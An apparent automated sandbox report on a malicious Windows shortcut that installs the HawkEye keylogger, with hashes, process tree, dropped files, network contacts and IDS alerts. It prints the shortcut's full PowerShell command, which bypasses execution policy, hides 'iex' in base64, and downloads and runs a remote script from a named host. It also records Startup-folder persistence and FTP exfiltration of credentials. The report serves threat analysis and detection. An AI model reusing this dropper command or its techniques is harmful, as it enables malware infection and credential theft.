File name: | 109284756_20190319.rtf.lnk |
Full analysis: | https://app.any.run/tasks/4c494e5b-a93c-4079-b49b-6d0aaabc7015 |
Verdict: | Malicious activity |
Threats: | Hawkeye often gets installed in a bundle with other malware. This is a Trojan and keylogger that is used to retrieve private information such as passwords and login credentials. This is an advanced malware that features strong anti-evasion functions. |
Analysis date: | March 21, 2019, 22:00:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=85, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized |
MD5: | 3069DBCBF086AF2F381D2DCE96BC6B36 |
SHA1: | D93EF0565F8167F0D072CAD0AAF49E0641A6AF39 |
SHA256: | 2C84AD611876EB434F38A0E2AC723955ADA6318AC4D0CC2D2E246746435B3A4A |
SSDEEP: | 24:8k/BHYVKVWS+/CWMlCcDhf8AkZJhmMFDAlZuP3M5/awGTl/03+/E4I0a5qVw:8g5akaAQ1AKP85iwGp/kAIW |
.lnk | | | Windows Shortcut (100) |
---|
IconFileName: | C:\Windows\System32\imageres.dll |
---|---|
CommandLineArguments: | -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://www.tigasinarmandiri.co.id/HK/out-1063786966.ps1');ext $wbB |
WorkingDirectory: | %SYSTEMROOT%\System32\WindowsPowerShell\v1.0 |
RelativePath: | ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Description: | DvLt |
TargetFileDOSName: | powershell.exe |
HotKey: | (none) |
RunWindow: | Show Minimized No Activate |
IconIndex: | 85 |
TargetFileSize: | - |
FileAttributes: | (none) |
Flags: | IDList, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, ExpIcon |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3472 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://www.tigasinarmandiri.co.id/HK/out-1063786966.ps1');ext $wbB | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2832 | "C:\Users\Public\acj.exe" | C:\Users\Public\acj.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2948 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | acj.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Assembly Registration Utility Version: 2.0.50727.5420 (Win7SP1.050727-5400) | ||||
3852 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmpB0BF.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | RegAsm.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual Basic Command Line Compiler Exit code: 0 Version: 8.0.50727.5420 | ||||
2160 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmpDA22.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | RegAsm.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual Basic Command Line Compiler Exit code: 0 Version: 8.0.50727.5420 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3472 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WNR4RG3C5GS079MIT207.temp | — | |
MD5:— | SHA256:— | |||
3472 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5017ddd8a3f3c918.customDestinations-ms | binary | |
MD5:AB2E6A77CEE43C91EFFA165473262439 | SHA256:71A70CE749545A17541D83D702988A7FFA470E1E977A69491C698BDDD083CA95 | |||
2832 | acj.exe | C:\Users\admin\LocationNotificationWindows\curl.vbs | text | |
MD5:EA7F67E8B572F81E3DACDE37E6F1FDB6 | SHA256:951A85732793F9CA8E8F049FD986A5AA635B4885DBFFCC0F0493EC9965A4AF22 | |||
3472 | powershell.exe | C:\Users\Public\acj.exe | executable | |
MD5:AB8B999AE4C76FEC297ED34D673824D9 | SHA256:6B5738CBE2D4B352D5D9C2F224F7CE7E0206FA11009416CF50FF96A723CB78C1 | |||
2832 | acj.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\curl.url | text | |
MD5:4C3724EF10A7B6343A5A914AADE7F2D5 | SHA256:BDB3E2A5ABBFBDA34AFFBBD94840AB8AAA926EFDE20764341A9EC83D9B36EE29 | |||
2832 | acj.exe | C:\Users\admin\LocationNotificationWindows\AppXDeploymentExtensions.onecore.exe | executable | |
MD5:B5E8D5DA168CD4678924F88859D2C7DE | SHA256:44930B59BEF77DE8EEA146C803827058BB001965DC1A8AE5B2DF07343359F90B | |||
3852 | vbc.exe | C:\Users\admin\AppData\Local\Temp\tmpB0BF.tmp | text | |
MD5:3E1E093DCCE32C716267A28292E0EE27 | SHA256:56285445424AD06DC043154819B5BDABAA7C26F5779CA3E37E08424ED9926CB8 | |||
2160 | vbc.exe | C:\Users\admin\AppData\Local\Temp\tmpDA22.tmp | text | |
MD5:7FB9A9AD0FD9B1E0108ED71FBB276048 | SHA256:7D63C301317E144B0133A72250AE2D8E09AF65A92E6A807EC58A71939FE530A9 | |||
2948 | RegAsm.exe | C:\Users\admin\AppData\Local\Temp\25291068-43af-3e16-50f6-5889d9ce7904 | text | |
MD5:454353131947D1483FF5470107478978 | SHA256:2DF94DC1C58E952A1EBD1AE1185A291A8A573982CA90EC1BBB87B81126002668 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3472 | powershell.exe | GET | 200 | 153.92.9.220:80 | http://www.tigasinarmandiri.co.id/HK/out-1063786966.ps1 | ID | text | 2.64 Mb | malicious |
2948 | RegAsm.exe | GET | 200 | 66.171.248.178:80 | http://bot.whatismyipaddress.com/ | US | text | 15 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2948 | RegAsm.exe | 153.92.9.220:21 | www.tigasinarmandiri.co.id | Hostinger International Limited | ID | malicious |
3472 | powershell.exe | 153.92.9.220:80 | www.tigasinarmandiri.co.id | Hostinger International Limited | ID | malicious |
2948 | RegAsm.exe | 66.171.248.178:80 | bot.whatismyipaddress.com | Alchemy Communications, Inc. | US | malicious |
2948 | RegAsm.exe | 153.92.9.220:30039 | www.tigasinarmandiri.co.id | Hostinger International Limited | ID | malicious |
Domain | IP | Reputation |
---|---|---|
www.tigasinarmandiri.co.id |
| malicious |
bot.whatismyipaddress.com |
| shared |
ftp.tigasinarmandiri.co.id |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3472 | powershell.exe | A Network Trojan was detected | ET TROJAN Windows executable base64 encoded |
3472 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable base64 Payload |
2948 | RegAsm.exe | A Network Trojan was detected | MALWARE [PTsecurity] Spy.HawkEye IP Check |
2948 | RegAsm.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
2948 | RegAsm.exe | A Network Trojan was detected | MALWARE [PTsecurity] Spyware.HawkEyeKeyLogger Exfiltration over FTP |
2948 | RegAsm.exe | A Network Trojan was detected | ET TROJAN HawkEye Keylogger FTP |